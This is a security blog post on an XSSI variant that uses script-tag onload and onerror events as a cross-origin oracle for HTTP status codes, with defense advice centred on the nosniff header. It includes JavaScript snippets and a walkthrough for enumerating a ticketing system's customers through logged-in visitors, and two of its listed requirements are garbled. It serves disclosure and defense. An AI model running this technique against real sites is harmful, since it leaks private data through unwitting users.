Attack and Defend: A new Cross Site Script Inclusion vector

This blog post may be of interest to the penetration testers out there. While playing with Cross Site Script Inclusion (XSSI) recently, Dennis realized something new about the attack. He discusses the attack, as well as looking at it from both the attacker perspective and the defender perspective.

Introduction

While playing with Cross Site Script Inclusion (XSSI) recently, I realized the attack can be used to leak information, cross-origin, from HTTP status codes. If you're thinking "XSSI Login Oracle" then you're on the right track, but the attack can be expanded to more situations. Login oracles are usually JavaScript files that load or don't load depending on current authentication status. However, this attack can be done on HTML, JSON, XML, or just about any content type. This dramatically opens up the attack surface of XSSI to enumerate information from GET parameters, one bit at a time.

I haven't seen this specific attack published anywhere, so I'm going to attempt to make this post as comprehensive as possible. Edit: domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called "XSSI". My blog post presents some new ideas about the attack, but referring to it as “new” is a bit bold and isn't quite appropriate.

I've also structured this paper for easy reference. The structure is as follows:

  1. Attack
  2. Attack Requirements
  3. Defense
  4. Further study
  5. Summary

TLDR Attack: Read "A More Interesting Example" in the Attack section below for a walkthrough. TLDR Defense: Use the nosniff HTTP header ("Requirement 1" explained in Defense section below).

I won't explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I'm presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating.

1.) The Attack

The basic idea is very similar to a XSSI login oracle. An attacker attempts to load script tags to his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1). 

So what's the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint but potentially a lot. After all, the HTTP status code is meant to return information, and often does for API's.

Some Basic Examples

Imagine an /admin directory that returns a 200 status code and HTML if you're authenticated, and a 401 with an HTML error page if you aren't. This would act not only as a login oracle, but it would also allow the enumeration of privileges. If there was a unique profile page for each user (ie: /profile/dennis) then a similar attack could be used by a malicious site to identify specific users for further attacks and play innocent to response teams. If a page has SQL injection in a GET request but cannot be reached by the attacker, the attacker can cause authenticated users visiting an attacker controlled page to bit bang the injection for the attacker and leak the results cross origin to the attacker's JavaScript.

A More Interesting Example

Let’s walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to "/search?c=d*", where the “*” character is acting as a wildcard, will return all the customers that start with the letter "d" and a 200 status code. If no customers match the “d*” pattern, then a 500 is returned. An attacker wants this information, but can’t login and just look. So instead he asks an already logged in user to make requests in the attacker’s behalf and tell the onload function “yes, I found someone” or tell the onerror function “no, that search returned nothing”.

It’s similar to exploiting a blind SQL injection except it’s through a third party and you're abusing Same-Origin Policy instead of syntax. Notice, the content type returned in the body by the ticketing system does not need to be assumed here. The search can return JSON, XML, HTML or even an image, it's all the same to this attack as long as the nosniff header isn't being returned (Requirement 1 in defense). URL parameters can be included in the script src attribute so an attacker can create a script like so:

	d = document.createElement('script');
	d.src = victim_domain + "/search?c=a*";

This will send a GET request to the “/search?c=a*” API on the ticketing system. Now the attacker just sets the onload and onerror events to log success and failure respectively:

	d.onload  = function(){client_exists("a*")};
	d.onerror = function(){client_does_not_exist("a*")};

Then append it to the DOM:

	document.head.appendChild(d);

Any visitor to the attacker's site will then automatically send a GET request to the ticketing system, cross-origin. If there's a customer that starts with "a", then the endpoint will return a 200 and the onload will execute. The attacker's onload handler would then load another script into the DOM asking if there are any customers that start with "aa". If the onerror event occurs it's because there were not customers that started with the letter "a", so the attacker would then load another script into the DOM checking for customers who start with the letter "b". The script would continue with a tree searching algorithm until a valid customer name was returned.

Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information. For example, an endpoint that searches for email addresses associated to a customer. The attacker could also search for customers matching the "*" pattern. If this fails it means the visitor doesn't have access to the ticketing system customer search and no further requests need to be made. Because the information stealing requests are being performed by visitors to the attacker's site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage from even an internal ticketing systems.

2.) Attack Requirements

To put it simply, the following elements are required:

  1. The 'X-Content-Type-Options: nosniff' HTTP header is not being returned, unless the content type is JavaScript.
  2. The endpoint must respond to a GET request. 
  3. span class="redactor-invisible-space">
  4. span class="redactor-invisible-space">

The most concerning thing is what is not said here. There is no mention of content type, other than JavaScript in requirement 1. So, this attack works on XML, JSON, images, or any other content (so far as I have seen). (See Note 2 in "Requirement 1" below for details). More details on the requirements follow in the defense section. Pentesters: you should read that section too, because it explains some more tricks in greater depth.

3.) The Defense

You just have to disturb one of the above requirements. Let's go through the requirements in greater detail from a defensive perspective.

Requirement 1

If the ‘X-Content-Type-Options: nosniff’ HTTP header is returned, this attack won’t work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser "When I say I am giving you <Content-Type> I mean it is really <Content-Type>!".

Why does this work? All types of files are served over HTTP, and web developers aren't always good about declaring the file type properly. So when a browser requests a JavaScript file, the content-type header may declare it's actually HTML. A browser thus puts off producing an error until it tries to parse the file as JavaScript. At that point, onload has already executed and any parsing errors will call the window.onerror function. The existence of the nosniff header means onerror will always be called immediately if the content type isn't stated correctly. Always onerror means no measurable difference and no information loss. If the content type is JavaScript, nosniff doesn't help and you have a normal XSSI attack.

Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed also, I don’t know when support started but I have found Firefox 50 Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven't personally tested either of them.  Edit: 1lastBr3ath from Reddit pointed out Safari doesn't support the no-sniff header, Edge does. Also he corrected my mistake, it is Firefox 51 not 50 that included support for no-sniff.

Note2: On the topic of what content type, 1lastBr3ath from reddit pointed me to this documentation, which is really where I should've pointed to.

It states:

The script should be served with the text/javascript MIME type, but browsers are lenient and only block them if the script is served with an image type (image/*), a video type (video/*), an audio (audio/*) type, or text/csv. If the script is blocked, an error is sent to the element, if not a successevent is sent.

So all content types won't work in script tags. However, typical informational content types, like XML or JSON will. This restriction can potentially be bypassed by just using a different tag (See Further Study: other tags).

Requirement 2

Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can’t be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same.

Requirement 3

If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don’t just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead.

Constant HTTP status codes do stop the particular attack described here, but other attacks may still be possible. For example, a top level JSON array can be parsed as JavaScript while a top level JSON object can not. So even though your endpoint always returns 200 status codes, information can be gathered from whether or not there is a parsing error by creating a window.onerror function. Applying the nosniff header will stop even this attack as long as the Content-Type header is appropriately set to JSON.

Requirement 4:

If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information.

4.) Further Study

3XX codes:

I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too.

Other tags:

I believe img tags pointing cross-origin behave similar to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look.

Other Attributes

I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS then there are bigger problems then this attack.

I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request.

5.) In Summary

Any detectable difference in loading a cross origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though unlikely).

Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily.

Attackers: Same origin policy is a little understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross origin via script tags.



Close off Canvas Menu